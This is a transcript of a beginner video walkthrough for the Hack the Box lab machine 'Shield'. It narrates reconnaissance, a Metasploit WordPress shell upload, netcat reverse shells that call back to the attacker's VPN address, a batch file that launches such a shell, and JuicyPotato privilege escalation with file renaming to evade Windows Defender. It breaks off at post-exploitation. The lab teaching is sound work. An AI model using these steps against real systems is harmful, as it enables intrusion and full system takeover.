Hello and welcome to my video tutorial on Hack the Box. My name's Adrian. This is the second tutorial that I've made. The first one was on Pathfinder, which was the fifth one on the list. I believe this is the fourth one on the list. If not, then it's either the fifth one on the list. But either way, it's the one before Pathfinder, because I've for some reason I've done them in reverse order, which isn't a massive difference other than the credentials that you get to be able to, the username and passwords that you find to do some of these exploits. It's assumed you already know them from a previous machine, but luckily in the PDF walkthroughs that are accompanying the boxes you can find these no problem, and I'll point out where we can find them, so that retrospectively, if you were to do this machine first and then Pathfinder, the username and password that you'd need for Pathfinder you can get at the end of this video. I'm pretty new to hacking, and so I like to do my video tutorial in a slightly more beginner friendly step-by-step process, where I like to go through every little detail, just to help reinforce my own learning and also to give back, really, because if you are struggling and another tutorial has been able to help get you through, hopefully this one can, because it will literally go through every little detail. So first of all, I'm going to assume you already have Kali Linux installed, whether you have it on bare metal or if it is in a virtual machine like I am using. I'm using the VirtualBox, which can be downloaded from Google, and then you need to download an image, a disk file image of Kali Linux, which again can be simply downloaded from Google. I'm going to assume that you've already done that step. There are plenty of walkthroughs on how to do that. I may make one as well in the future. And this is a clean, fresh snapshot. It's from the machine. The OS has just been installed, so everything is brand new, as if it was a clean install. And hopefully that will match or help out people, because if you have any problems, you might want to wipe your VM OS of Kali and maybe install it again, or start from your first snapshot that you made, probably when you just initiated the system for the first time. So the first things first, on the top left we're going to click on the little search icon and we're going to type in Firefox. Probably my favorite browser to use, but it doesn't really matter which browser you use, because we just need a browser to get to Hack the Box. While Firefox loads up, I'm just going to open terminal prompt. I'm going to drag that to the right of the screen and drag the web browser to the left of the screen, and then in a moment you're going to see me open up many terminal prompts all at once. That's done with the keyboard shortcut. I'm holding Control, Shift and pressing T a few times, and as you can see there, I've got all those tabs open. So get yourself logged in to Hack the Box. I'm just going to skip this part of the video so no one sees my password. And once you are logged in, we're going to click on Labs, and then we're going to click on Starting Point. And here are the machines. It is the fourth one down, then Shield, and you'll notice mine is already active. I have already had a go at this machine, and I did try and record. Make sure you join machine, and then you'll see the IP address 10.10.10.10.10.29. Yeah, so I was going to record myself solving the machine live, and putting and talking about it at the same time, but I found it was too chatty, and although I'm quite chatty now, it was worse, and I felt it like it would be too confusing for someone following it, and it would be a mess to edit. So I decided to just go ahead, do the machine once, then do the machine a second time, which is the footage you're seeing now of me going back over it, and then this is like my third time through is me watching me do it and commentating over it. Hopefully I can be a little bit more directive, get straight to the points that you need to know, kind of thing. So once you've connected to the machine and you've got the IP address like this, you'll see the green dot at the top that says it's flashing green next to active, and you'll see in the top right it says connect to HTTP. That's what we're going to need to click on next. So I'm just going to move that to the left hand side, click on that red button, and then we can connect either to the regular machines, which I've not tackled yet, the starting point machines, which are these nice and easy first ones, which is what we're doing now, and then a release arena at the bottom. They've got an updated one, Peekaboo, which is more like a competitive type, a newly released machine for people to have a crack at. We're going to start with starting point though, and then we're going to click on Open VPN. I recommend using this because it's essentially going to get you used to using your own terminal within your own virtual machine, as opposed to using Palmbox, which I think is more like a web-based experience. But you only get a certain amount of time access to it anyway, unless you are a paid subscriber. And then we are going to click on download VPN. I'm using the US servers because it seems to work great for me so far. If you're having a trouble with the EU one and you're in the EU, try the US one. Hopefully it will sort out any issues. Then it will start to download the OVPN file, and we'll make sure we save the file. If you're not using a clean install and you've already done this, then you don't do this again. This is just if you're like me, you reset your machine every time, and make sure you know where this gets saved to. By default, it's probably saved into your home directory, into the downloads folder within that. Yes, so like I said, if you have already downloaded this file, you don't need to download it again. But if something's going wrong, then maybe try this step again. You might need a new clean file and to rerun this process. Change the directory to where it is stored. Once you found the file, you then simply need to use sudo open VPN and then the name of the file. And you'll see me here in a second. Just press tab to autocomplete the command, because there's only one file in there. And then if you do use sudo, make sure you know the password, and at the bottom it should say initialization sequence completed. That means it's ready to go. And if you were to use if config, hopefully you will have a new interface. This one's called ton0 and it's on 10.10.14.167 for me, but it will be different for you. Now, something that I did talk about in the previous video, but I'll mention it again briefly, is if you go to Google and type in Sublime, and then we're going to click on this link in a second, we're going to download Sublime or install it. Sublime is basically a notepad type application, like a basic word processing app. You could easily use pen and paper, but it's just a good way to copy and paste in information into really quickly and easily. It's not too dissimilar from just typing stuff into terminal really, but it's just a way to keep it more safe, and we can save it, whereas in terminal it's a bit more, in random access memory, it can easily get cleared and lost. But if we can keep it secure, our notes, things that we want to keep a note of, if we can keep that secure in Sublime, then that would be great. Once you're on the website, click on the first blue button. That will take you to this page. We're going to copy and paste this code into a terminal prompt, and we do that by holding Control and pressing C on the web page once we've highlighted the text, and then clicking on the terminal prompt and then holding Control Shift, those two buttons, hold them both, and then press the V. And you may get some extra little characters pop up on the left and the right. I just had to delete those and make sure that we're only typing in exactly what is from that web page. That one was pasted in fine, perfectly. And then we're going to copy this under the stable release. We don't need the developer release version. And then the last thing is just going to update apt, and then it's going to finally install Sublime Text. And this should be really quick. I think my internet or my connection was a little bit slower today, but yours should happen nice and fairly quickly. While that's going on, I was just trying to remember what I did now. I think I created a folder for this machine. So I went into my documents, I'm typing in mkdir, make directory, and then the name of the directory, which is shield, and list. There you go. You can see it's within that document. So the folder shield is within the folder documents, and when we save stuff, when we want some tools, I'm going to put it into that directory for today. So once it's finished installing Sublime, you can just type in subl, subl, and you can see we have opened up a new file, and then within that file there's many different tabs we can open up, which is done by holding Control and pressing N for new. The first tab, I always like to just jot down the IP address of the machine that we will be exploiting, and then just the name of the machine. So that tab will show us at the top. It'll always be there for us, 10.10.10.29. And then the second tab, I always like to just put our IP address for the VPN connection, which is in my case 10.10.14.167. I'm going to put us for us, you and me. But keep in mind your machine will have a different ton0 IP address, so just obviously make a note of yours for whatever it is. Okay, so I can close the Sublime window. First thing we're going to do is always just double check if there is a web server, a website for the machine we're attacking, and in this case there is. It takes us to a IIS server, Internet Information Services, which is very much Microsoft, a Microsoft server. Yeah, it's kind of like if Apache is more Linux, IIS is more Windows. The first thing I thought I would do is a mass scan and just see what ports are open. So we type in mass scan 10.10.10.29, the IP address of the machine. Then we do -p, then we do a finger space 0-65535, I believe. No finger spaces in that bit. And that's just specifying which ports we want to look at on that machine, and I believe there are 65,435 ports, well, plus the 0 port, so 65,436 in reality if you count port 0 as a port as well. But if you type that command in and then press enter, it should start up a mass scan for you. Now I did have a little bit of connection issues, I think, because I also tried to use Dirbuster. Dirbuster, or Dirb, it's essentially going to try and find other pages within the web server. So you might see me in a moment. Just skip the video ahead to that. So I was just getting my notes ready to type in something that mass scan could find, but as you can see, it's taking a while. I don't think it normally takes this long. Even if it is checking all those ports, it should be a bit quicker than that. So yeah, this is the Dirbuster that I mentioned. So we type in sudo dirb 10.10.10.29, the name of the address of the machine, and then obviously because we use sudo, we need to type in our password. However, I forgot to use http : / just to specify that it is that's the format it needs. And you can see here by default, Dirbuster uses this directory and this file called common.txt. So if we were to change directory in a different terminal window, we can see that in that directory, there it is, common.txt is a file. And there's many different files in there, but this is just the one that it happens to use by default if you don't specify any others, because it's got a lot of common names of directories on websites. But as you can see here, my mass scan was taking a while, so I think what I did was I cancelled it, and obviously I've got Dirbuster running as well now, so those two simultaneously will be working in the background, so that will obviously slow each other down. So I think in a second I'm going to cancel the mass scan because it was just taking too long. And you can see here Dirbuster is trying to find anything that exists really, so it's testing out all these, seeing what exists, and at the moment none of those do. Eventually we'll find one though. You could just as easily brute force it yourself by going on to the web browser where the IP address is, typing in a / and then typing in different words, and if it exists, bingo, it'll take you to that page. So as you can see here, it was just taking too long. So I opened up a new one, but I think this time I entered the rate I forgot to put the HTTPS thing again. I'll tell you in a second. I also used finger spaces there when I shouldn't have. Yeah, so I used rate 1000, but I think you need to use a double slash for rate. I can't remember if it's double slash or single slash. I saw my error there, so I deleted those finger spaces. Yeah, and it was throwing back an error message basically saying that's not quite a valid command. So I tried the double dash, which was better. It didn't nag me this time though for the HTTP thing. It just assumed. Oh no, it was the Dirbuster one, wasn't it? Dirbuster was the one that needed the HTTP. Masscan just assumes it is HTTP by default. So I had them both running, and I was just seeing if one was quicker than the other, and it did look like the second one was faster because I set the rate to 1000, which is something to do with kilobits per second, I think. So that other one was only like 1 kilobit or 10 kilobits per second. So I cancelled the other one and left this one running. You can see here nothing has quite been found, and it kind of glitched out. So this is where I'm going to skip ahead in the video because it just took a lot of time, and in the end I ended up refreshing the Hack the Box page and cancelling these, and it worked again. So if you see problems like this where it's just running a bit slow, you might just want to refresh things. So once I'd refreshed the web page and got things back again, I just thought I'd go straight to Nmap. I didn't want to waste time with the mass scan. In this case, in this machine, it's not very useful anyway. So I'll type in nmap/vv/f for fast, and VV just means verbose, and it's level 2 because there's 2 V's there, which means tell me more information. And then the IP address, and we can see here it's come back with port 80 and port 3306, both of them using TCP protocol. They're both open, and one of them is HTTP and one of them is MySQL. So I just copied and pasted that information into my Sublime notes, and then I thought I would try to see what, a bit more specifically, what services was running. Well, I think I did SC first, which is like script, which is to check for vulnerabilities, and then I'll do SV in a second, which is for services. So I copied and pasted this information in. It wasn't much. There wasn't really any vulnerabilities that Nmap could point us in the direction of. It just says here there it is, an IIS Windows Server, which we already knew just by typing it into a web browser. So I'm just tidying up my notes. What's more interesting is this 3306 though, MySQL. You know, I'm quite new to this port and to this service, so if you ever see something that's a bit unusual, it's probably a good idea to type in to Google the port name and just check what is this port for, or what are its vulnerabilities, which you will see me do now. And then anything interesting you find out, always store it if you have your own kind of notes. So I have my Microsoft Word, as you can see at the bottom, with my cheat sheet of notes and things, because that's how you learn, really. You're going to have to piece by piece learn little things to, you know, and eventually you look back in like a month or so, 6 months time, and you'll be like, wow, you know, I do know quite a lot now, you know, off by heart. Like this port is this, and this is usually vulnerable to it, and that's how you pick up hacking, I imagine. It's very much teach yourself, trial and error. So as you can see now, I get rid of SC and I type in SV. Make sure it's capital V though, that's why it didn't work there and threw me back a help menu. So I remembered it was S capital V, and I've just left the slash capital F on because that just checks 100 ports, and it's like the 100 most common ports, and there's only 2 that are open. And here we go, we can see it is MySQL on 3306, and we also get some information that the operating system is definitely Windows then. And CPE I think means Common Platform Enumeration, so it's like the avenue that you want to go down to exploit it, and it just tells you, yeah, Microsoft Windows. So any exploits that work with Microsoft Windows, you know, are likely to work depending on the OS, of course, and the updates that the machines had. So nothing brand new information, really, nothing too out there. So I thought I'd try script vuln for vulnerabilities. Very similar to SC, really. Just see if there's anything else I could find in terms of what is possibly exploitable. But it kind of timed me out. As you can see there on the right, it's trying to finish off something but doesn't have the privileges to do it. Maybe if I had put sudo in, it would have worked better. But I forgot to. Meanwhile, on the left, I just did a quick Google search for MySQL vulnerabilities, because we know that's the service that's running on those ports. Well, at least on 3306 port. Yeah, so I saw that wasn't really working, so you'll see me cancel that nmap scan in a second. And Google kind of straight away, a few websites were saying that 3306 should be closed. It is vulnerable because you can connect remotely, and the better option is to use port 22 to use SSH secure shell, which will be encrypted as well. So that's a much more secure way of communicating with the MySQL database. So this is me just guessing at what possible directories within the web server existed, but I couldn't see anything here. But this is where the dirbuster will come in handy in a second, because that will find, with the brute force dictionary attack, that will find some web pages that exist. So the command is dirb, and I started it with sudo dirb. Did I remember HTTP? No, I didn't. 10.10.10.29 for the machine, obviously type in Kali. And then this is where I remembered, oh yeah, dirbuster needs HTTP : / I put one at the end just in case. And again, it's using that default file common.txt within that direct, that's the real path location to get there to that file. And you can see this is running, at least I felt it was, this is running much quicker now. When I did it earlier, it was obviously a lot slower, but now it seems to be running quicker. Whether that's because I refreshed the web page, or whether it's because the mass scan isn't running. And while this was going on, I just decided to do a bit more reconnaissance on SQL. And yeah, basically people talking about the fact that it should be closed, and you want to just use secure shell, because there's quite a few exploits available on this port for MySQL server. I'm just going to skip ahead in the video until the dirbuster manages to find something useful. Aha, and eventually dirbuster finds us WordPress is the name of a web page within the server. So we go to our web browser, type in /WordPress, whatever the dirbuster tells us, and here we go. If we find something interesting like this, it's always worth a look around. So now that we know there is WordPress, which is like a website type of tool where you can customize your own web pages or your own blog. Now that we know there's WordPress, we can look for more exploits that can get into the machine via WordPress. So it's always worth a look around. I noticed that there is an account called admin, and he's left a comment, so I thought I'd just check out what his comment was. So we can see the name of the account is admin, so he probably is, the administrator account. So we're already halfway there. We've got the username admin with no capitals. We just need the password now, which in a previous machine we did get. So I'm going to skip ahead to the video to the login page. To get to the login page, we just click on login where it says meta down here, and just click on login. So back on Hack the Box website, we're going to go to walkthroughs. We're going to click on download, and then open this with Firefox, the PDF, created by Trix, TRX, who made the machine as well, so big props and thank you to him for designing the machine and taking the time to create this handy walkthrough as well. So my job in the video tutorial is just kind of like to help people through it, in case they make a mistake in it, or if it hasn't quite explained exactly what's happening. Hopefully that I can explain what it is, what's going on as best to my ability, because I'm not an expert. So we've kind of done all this. We didn't use GoBuster, we used Dirtbuster, but we found the same result. We found there was a WordPress web page, and we navigated to it. And then now that we know there's WordPress, we can probably use Metasploit MSF console to take advantage of the fact that there is a WordPress. But to do that exploit, you're going to need the credentials, which were found in a previous machine. So because I've done them in reverse order, though, you wouldn't know this password at the moment unless you'd done the previous machines. So I'm just going to copy and paste in then the WordPress credentials into my Sublime Notes. I like to copy and paste in case I mistype or misread what is on the screen. So that's why I know the username is admin already. We know that from the website. So I copy exactly what the document is. Sometimes you miss an L for like an I. You mistake an L for an I or an I for an L. So I'm going to copy that from my Sublime Notes back into the password box. Save it, might as well. And yes, it is the correct password we are in as the administrator account. Now, because we know the WordPress's admin account, the username and the password, we can use Metasploit, and there's a good exploit already created a while ago now called WP admin shell upload, and this will be in the MSF console. So Metasploit is a very popular, widely used tool that will help ease the process of getting in. It's got like all the exploits in a database already there. We just need to search and find for the one we want. It will create it and upload it, and if the exploit is successful, you probably gain access in some capacity to the machine. So the first thing I'm doing is just checking if my version of Metasploit needs updating. So I type in MSF console and then -H just to show some help, but nothing here points to MSF being able to be updated. So I typed in the man MSF console for the manual page, and it's pretty much showing me the same thing as the shorter help page. Nothing here is talking about how to update the application. So I'll press Q to quit, type in the word clear just to clear the screen, and decide that, well, Google's probably your best friend again. Typing in MSF console update command, so you know what the command is, and it says there you can simply enter MSF update at the command line. So this website, thank you to these the author, creator of this site. Quite simply, MSF update. So I do try that, and yeah, I kind of already knew it wasn't going to work. It's no longer done via that method. It's done via apt. So instead, we're going to use sudo apt install metasploit -framework, and you don't need the not the asterisk. You don't need the comma, inverted comma, quotation mark. It's nice and simple, and it gives you a good little progress bar, so to speak, with the percentage of how much is completed, so we can keep an eye on that. So meanwhile, I'm going back to the help page, the PDF. We know that we're going to need to open Metasploit, and then we're going to have to find this exploit, which is in the Unix web app folders, directories, and the name of it is WP admin shell upload. Now we could copy and paste that and just type in, copy and paste in use and then that whole real path location. I'm just going to quickly search for it in a second. Yeah. So I never knew about this WP admin shell upload, but apparently it's a popular thing. So like I mentioned earlier, it's good to just, when you're learning hacking, to keep like a document of all the things that you pick up, because there's so much stuff to remember that it's not possible really to remember everything. You need to to keep a kind of like a database yourself, really, of what is handy, what commands are quite useful. So once we know that Metasploit is just fully up to date, I'll just type in MSF console, give it a moment to start. It always shows you a nice fancy banner, unless you use a flag to not show it. And then I'm going to just search for WP admin shell upload, the name of the one we want, and it's found two. It's found these two, and the first one is Sonic Wall, nothing to do with what we're doing, but the second one is an exact match for Word, and it says down there WordPress admin. That's exactly what we're trying to exploit. So we're going to type in use and then the number 1 because in my case it was next to 1, not next to 0. And then we're going to type in show options. We can see here that we have a few things that they are required to be set. If it says required yes, then you know we need to set it. So for example, username, yes, we need that, as well as the target URI, universal resource indicator, I think, reform indicator, something like that, basically the URL. And also the local host, it thinks we're on 10.0.2.15, which is my machine's private address, but we need to use the iTunnel VPN address, tun0, and for me it's 10.10.14.167. Just double check because yours is probably different. So we're going to type in set lhost and then the name, the number of the interface. Don't forget capital letters for lhost. And if it works, you can see like that, you'll get an arrow pointing to what it is now. Then we're going to type set r hosts, and then we're going to type in 10.10.10.29. That will be the same for you, unless they change the IP address of the machine. And then we're going to set the password that it's going to use, and luckily we know this from a previous hack. And then we're going to set the username, and yeah, I did it the wrong way around. Don't do capital set. Lowercase set, capital username, and we know the username already is admin. And then finally we need to set where this is located on that machine, and it's located under /WordPress. Nice and simple. And I think, yeah, I was just showing you that we found that out thanks to Dirbuster revealing it with a dictionary attack. And then we can just double check. Yeah, this is the website we want. WordPress. Now I was a bit confused why it wouldn't have been instead WordPress/WP login. Like I was confused why wouldn't it be this address. Just get rid of that bit kind of thing. Now that I'm not logged in as the admin, it still takes me to this page, but this isn't the login page, so I don't know why it doesn't need the exact address of the login page. It needs the address of that first page, with the background of space. Maybe it's because it's the root of that web page. I'm not sure, but either way, make sure it's just target URI/WordPress. And when you're ready, we can type in exploit. Here I type in run now. It does the same thing as exploit, and it'll work when the word meterpreter appears, and you type in dir, and you can see that yes, we are in C:, and there's a few folders that we're within, and this folder we're in has got a very strange name, probably just created by us now as part of the exploit. So we're going to use cd for change directory, and then I was just messing around trying to see could I go straight to the root, and I thought, well, the root's just /, isn't it? cd/, and that wasn't working. But that's not the machine's fault, that's meterpreter. This shell meterpreter doesn't understand what I'm trying to get it to do. If you did that on the machine itself on Windows, it would probably work. So I was just double checking what is the command again to change directory to root in Windows. And Google says type cd/, but obviously this isn't a DOS prompt, this is a meterpreter shell within terminal, so it wasn't quite going to work. pwd works, print working directory, just shows us where we are. So I do cd ... just to go back a directory, and now we're in plugins, just double checking. and then just seeing what's in the plugins, and you can see there's many other files that are folders, sorry, that are similarly named to the one we were in. So I'm guessing these are other people who have tried to also hack into it. And I saw something quite funny. The name of the file was like hello something, hello Dolly was it? So I did a cat command, see what was in it, and sure enough, it was a very strange little plugin. I don't know whether another hacker has put that in or whether that was there already. Yeah, hello.php, a Python script, very strange. Nothing to do with us though. So I changed directory back up out of this one, see what's in this directory, WP content, and we can see there's an uploads folder. Now you don't have to use this one, but the PDF does tell you to use uploads because it's probably got write permissions, so it's probably allowed to be written to, which means you can upload files to it. But I found out later on, as you'll see in the video, we can also upload to the that initial folder that we created. So now we're going to need to use netcat, which is the Swiss Army knife. I did a quick Google, and it's often described as the Swiss Army knife of remote connections. So you can set up using TCP or UDP a connection to a machine. I like to think of it as it listens, and then once the machine calls back to it, it will give you a shell in that machine. So it's I think most of the time it's used as a reverse shell. So we're going to set up a netcat listener on our machine, and when that remote machine that we're attacking calls back to us, we'll gain access with that netcat shell. So we're going to type in background just to go back for now and leave that remote machine, and we're going back to our machine, back into MSF console. And I was just checking what directory we were in, because we need to upload the netcat executable file, and when we execute that will run the process that we need for it to call back to us. So I went into a new terminal and tried to find the name of the file, and it is called nc.exe because it tells you that in the PDF. But I thought, well, how would you know the name of the netcat file if you didn't have the guide? So I tried using locate, and there's no such thing called netcat.exe. But I saw here there's some folders, and I thought maybe this would be a good one, user/bin/netcat. So I'm just changing directory to that folder, but then I realised it wasn't a directory, so we just got rid of the netcat bit, because that'll be some kind of file or something inside it. And there was quite a few, as you can see, quite a few directories or files within that directory. So I had a look for where netcat was. So it's alphabetical order, so you can scroll up and look for the N, and then NE for net. And then I did find it here, and then I do see as well above NC, I think, but it wasn't quite nc.exe what we needed. So I thought, well, what file is it? So you type file and then the name, and it'll tell you what it is, and it's just a symbolic link to etc alternatives netcat. So it's some kind of link shortcut type thing, not actually the file we need. And I couldn't go and follow that link. At least I don't know how, if you could, because CD wouldn't work. So back to Google, our old friend. What is the netcat file called? And we already know it's nc.exe, but how would you find out if you didn't have a guide? And then Google has given us quite a few little websites that have come in really handy. So this one come in really useful. How do I use netcat? And it kind of tells you that it's already pre-installed on Linux and Mac OS, so we don't need to worry about downloading anything. Maybe you do need to worry about updating it, but it's already there. And if you're using Windows only though, then you would need to download it and go about running it from the DOS prompt. But here it tells us the name of the program, nc.exe. There you go, so that website tells us. So I thought I'd try and find that, locate. Oh, I just thought I would change directory back to my home folder, just in case it needed to, just in case locate starts from the folder you're in and works, you know, that way, but I don't think it does anyway. I think it will just search the whole machine. And sure enough, if you locate nc.exe, it does exist, and it's within that real path location. User share Windows resources binaries. So I thought I would change directory to that folder just to double check I can see it's in there. So we go to it and then we type in ls, and sure enough, there it is, nc.exe. That's the file we want. Now this is the default file within my Linux machine. I don't want to mess with that one. So instead I'm going to copy the file with cp, type the file name, and then we're going to type in the directory of where we want it to go. So I want it to go into my home folder, documents, and then that newly created directory I made called shield. So press enter, and then if we change towards that folder, just type in list, we can see it is in there, nc.exe. Super. Now in our in our MSF console, if we type in cd and then we change to the folder we want, so I've saved it in documents within shield, so I'm making sure that the MSF console is working within that folder now of shield. And in there, look, if you type in dir, the same as ls, you can see nc.exe is there now because I just put it in there. I just copied it in there. Okay, so now we just need to upload this file, but when you use the upload command in MeetPreta, it only uploads from the working directory that you're in within the MSF console. So we're going to type in sessions and then the number which has been assigned to that session, which is the MeetPreta we're using for this machine is session number 1, so it's sessions 1. Then I'll type in dir, just double check where we are again, and we're in the uploads, same place. Then we just type in upload, and then the name of the file we're going to upload, and nc.exe. Now you could, if you wanted to there, type in upload and then the real path location from wherever it is saved in your machine, and that would work just as fine. But if you just do upload and then the file name, it's only going to look for that file within the folder you're currently in, which is why I moved it to that document folder where it's in, because it's just easier to just do upload nc.exe as opposed to typing out the real path address. Then we're going to, once we've uploaded it, we're going to start a new terminal, type in nc-lvp 1234 1234. Doesn't really matter what you type in as a number, as long as it's an available port, and we've just got to keep that number consistent. So it's listening now, it's using port 1134, and it's listening if anything calls back to it. So we're going back to the remote machine and we're going to execute file nc.exe -a for argument. It's going to take, and then we're going to put the argument in brackets. What it's going to take, it's going to be execute cmd.exe. It's very Windows kind of command, this, and then the name, IP address, sorry, of our machine. So we are 10.10.1467. Couldn't quite remember, so I tried to use a keyboard shortcut to my Sublime file, and there it is, 10.10.14.167. Remember, if config can tell you what interface we're using for the VPN. There it is at the top, 167, and then we just need to make sure we use the same the same port number as the one that the netcat is on. So in this case we're just doing 1234, and then we're going to close brackets, and you should see process and then a number created, and if that's the case, then we know it's created that process, it's working. And if our netcat on our machine is working and it's listening to that port, they should boom have met each other, and it's like, yeah, you're now connected to 10.10.10.29, and it's using, I think it's on the port 51001 on their machine. So we're on port 1234, but they're using port 51001. And then we're just going to type in dir for directory and just see where we are, and we can see that we are in the uploads folder, and you can see the nc.exe sitting there. We just uploaded as well. So I tried to type in a few commands just to see what would work. I'm still getting used to what works in what shell. Who I am seems to work really well, and you can see there with the IIS for that Internet Information Services, and and /WordPress. So we know we're in the right place, but we're not quite administrator yet. So if we go back to the MetaPreter shell, though, sysinfo does work on the MetaPreter shell, and we can see that. I like to copy and paste this information as well. We can see that this machine, we can see that this machine is a Windows Server 2016 machine, which is good, because if you know your machine that you're attacking, if you know its OS and what update it is, you know what edition, then you can find more exploits by Google searching. And a popular one that a lot of people would know about is a rotten potato variant known as juicy potato. So it's based off a rotten potato, and I did a little reading around it, and it is very confusing. It's very technical, but essentially it's going to be, I even tried to do a bit more reading around what this meant, BITS. I didn't know what it meant yet, but I think I do find it in a bit what it means. Basically, it's going to act as, it's going to be like a man-in-the-middle attack, where it passes information between us and the remote machine, but it thinks we have administrator privileges. I think that's the basics of it. And the BITS is something to do with the Windows. It's a legitimate Windows thing, but we just take advantage of it because we have some kind of privilege. So I even tried to find what this meant. C assign primary token, and it mentions potatoes. I was like, oh, it's called juicy potato, is this it? And again, it was quite technical, and reading it, you can read it now if you want to, pause the video or find the website yourself. It is fascinating, but it is a lot for, you know, someone who's not up to scratch with all this kind of coding and these kind of exploits. It just say, I would assume that you already know about the rotten potato exploit, and I've read all the posts. No, I haven't. And then I thought, well, this bit's useful. Very short recap. We with the rotten potato exploit, we get an admin access token. Now, if we have the privilege to impersonate the token, we can run a process in this very high context system. Typically, local service accounts have the privilege and the other privilege that we just Google searched, so they can impersonate a different user. So it's basically impersonation. You know, we're impersonating like we are admin when we're not really. And then now we need to download the juicy potato binary, which is like a file that we're going to execute. So by default, this won't be installed, so we have to do a Google search for it. And the first thing I typed in was juicy potato, and it took me to this. And the first time I did it, I didn't need this website, this particular web page on GitHub. There's an even easier one than this, but I thought I'd just have a little look. And then I saw, BITS, what's it mean? And here we go. It means Background Intelligent Transfer Service. It is used by programmers and system administrators to download files from or upload files to HTTP web servers and SMB server message block file shares. BITS will take the cost of the transfer into consideration as well as the network usage so that the user's foreground work has as little impact as possible. So it's like in the background, it's not going to affect you. BITS also handles network interruptions, pausing and automatically resuming transfers even after a reboot. So it's something to do with file transfers between machines remotely. So I had a look at this and I was like, this is quite complicated and it's not exactly what we need. We just need the file, juicy potato. So I tried the second one, juicy potato hack tricks, and again it's kind of just telling us about it. It's not really giving us the file. We just need to download the file. So instead we're going to Google download juicy potato, and sure enough the first one there takes you straight to it. I mean, I probably could have found it through the other web page. Maybe there was a link on the other web page that took me here, but this is, as long as we get to this, is what we need. We're going to click save on juicypotato.exe and you can see it will go to our downloads folder. So we open up a new terminal prompt. I'm just going to head on over to the downloads folder. And then, yeah, we can see it's there, juicypotato.exe. So we are going to rename this file because Windows Defender might see the name of the file and decide to block it, and then we wouldn't be able to exploit using the file. So I'm just going to move it first of all with MV to that documents shield folder that I made, and you can see it's right there next to the netcat exe. You don't need to change the name of the netcat one, that's not mentioned, but it does mention that you do need to change the name of the juicy potato one. I wonder, that's strange, because surely if Windows Defender could pick up juicy potato, why can't Windows Defender pick up NC as a file name? But never mind. It's quite an easy way around of just dodging Windows Defender, if I'm honest. It doesn't sound like Windows Defender is a very good defense mechanism if you can just change the name of the file. But anyway, we'll change it just in case. So I just decided to call it juice. Don't forget the file extension name, so we need juice.exe, and there you go. You can see it's now changed its name, and it's sitting there lovely within that folder, ready to be uploaded. So we change our terminal back to the MSF console, and you can see here the meter preacher session died. Reason died. A great reason for why it closed, just died. It doesn't tell us how it died, but never mind. So we're just going to click run again, and as everything is already set, you don't need to type all those options in again. Just click run, and away you go. It just sets up a new instance, a new session, but this one's called session 2, so keep that in mind. When we link back to that, we need to type in sessions 2, because number 1 has already been come and gone. We can see we are in a new folder, but within pretty much the same location as we were the first time. So we're going to click change directory, and then I tried to type it out, or copy and paste it just to WP content, but again the meter preacher shell wasn't quite understanding what I wanted. So I was like, okay, we'll just use cd ... just to back up one folder. I think I'll do it again, back up another one. Here we are, we're in WP content folder, but we want to go into the uploads folder, and then we can still see our nc.exe is down there. And someone has already uploaded at js.exe, which is what the PDF suggests you rename the folder to. We called ours juice, but they renamed it to js.exe. That must be from someone else. So we're going to upload our version though, which was called juice.exe, and here you go. It's just been uploaded. Yeah, I'm just showing you here on the PDF. It's saying you should rename it. Oh no, we need to create shell.bat. That's it. We're going to create a shell script, a batch script, sorry. But someone's already made it, and I just thought I would cat out what they wrote, and we can see they've written the command in, and their IP address is 10.10.14.32, whereas ours is 10.10.14.167. But you can see they used the same command that the PDF document is going to use, and we're going to do pretty much the same thing. We're going to copy this and we're going to paste it into our Sublime document, because as you can see when you paste it, look, the finger spaces are missing. So I'll just read it through and check that we use, I don't want to put that one in there, that was a mistake. We use the correct finger spaces, because obviously it won't work unless it is properly spaced, so the computer, the machine knows what, you know, what code we want. And here I just need to separate the IP address from the port, separate that from the arrow sign there, and then from the name of the file. So that arrow sign just basically means whatever comes before it. So we're going to echo this out, we're going to say all this, and what gets outputted, which will be all this, we're going to put that into a file called shell.bat, which is what the arrow means. So the arrow means put all that into a batch script, basically like a text file. But we don't want to call ours our shell, because someone else already done that. We're going to call ours Shelly Nelly. Don't forget the .bat. Yeah, that finger space shouldn't have been there. And then don't forget to change your IP address to whatever it is on the interface you're using. So obviously I'm on 10.10.14.167, and then the 1111 is the port number. You can keep that as quadruple ones for now. So I'll paste that into the meter preacher just before forgetting that that actually needs to be in the netcat. There you go, unknown command echo, and that's when I realised it's got to be within the netcat shell that we have connected. So I'll copy and paste in the command here, and it does work. Obviously it shows us what we just typed in because of the echo, but if we type in dir, you can see that shellynelly.bat is there. Shellynelly is the one we made, of course. So back in the meter preacher shell, if we use dir again, yep, we can see confirmed Shellynelly is nicely uploaded. So now we go back excuse me, to, I think we need to in a second create a new netcat listener. Yeah, so we open up a new terminal, nc-lvp again, but this time I'm not going to use, oh yeah, we are going to use the 1111, sorry, which is in whichever number you typed in for the port number within the shell.bat file. Keep that listening. We need to now execute the netcat, the shell.bat file, to open up the netcat to link back to it. So again, I'm just copy and pasting this text into Sublime, because that way I can make sure it's properly typed out. So as is not called JS, as is called juice.exe. The -t, the asterisk, and the -p need to be, oops, sorry, knocked my microphone. They need to be separated with spaces. Everything else looks good. Need to separate the -l with the space, and then finally the port. I don't know why the author put 1337 when earlier he'd put 1111. We're just going to use, we're going to stick to the 1111. So don't put the other one, 1337. Put whatever port number you used with when you made that .bat file. So once we run that, give it a moment, and if it comes up with create process with token W and it says OK, then we know we are good. And lo and behold, on our new netcat, we are connected to the machine 10.10.10.29, and the port that machine is using is 51101. Typing in who I am reveals we are the authority/system, which means we are administrator. Excellent. And the PDF nicely tells us where the flag is, but if it didn't, we're always going to check within the users area and then administrator. So we just change directory / and then dir confirms we are at the root. We want to go into not init pub, but we want to go to users. Within the users, we can see there is the administrator profile. So we're going to change directory into that. Just ignore that. I was trying to mouse wheel to scroll down, but the shell didn't know what those inputs were, basically. Change to the administrator, and lo and behold, the desktop folder is nice and ready to be investigated, nice and pretty. And there it is. Within there, you've got the root.txt. You can use cat and then type the name of the file to show us what text is in there. And I think you can also, as it's Windows, you can use type, and it's the same thing. It shows us the flag as well, whatever text is in there, and that text is the flag, like the password that we need to prove that we have gained administrator privileges. So I'm just going to copy and paste that into my Sublime notes. You will obviously copy and paste this into Hack the Box on the page for Shield where it says submit flag. Copy and paste it into there. Give it a machine difficulty rating. I think this is one of the easier ones, but I just went for 5 again, fairly neutral. And it's thrown me up an error because I've already done it, but it'll say for you system owned. There you go, and it'll be green down here because it is now complete, and there's no that's it, there's no user flag, there's only a system flag. However, we're not quite finished because there is a bit of post exploitation, which means after the fact it's been exploited, we can use 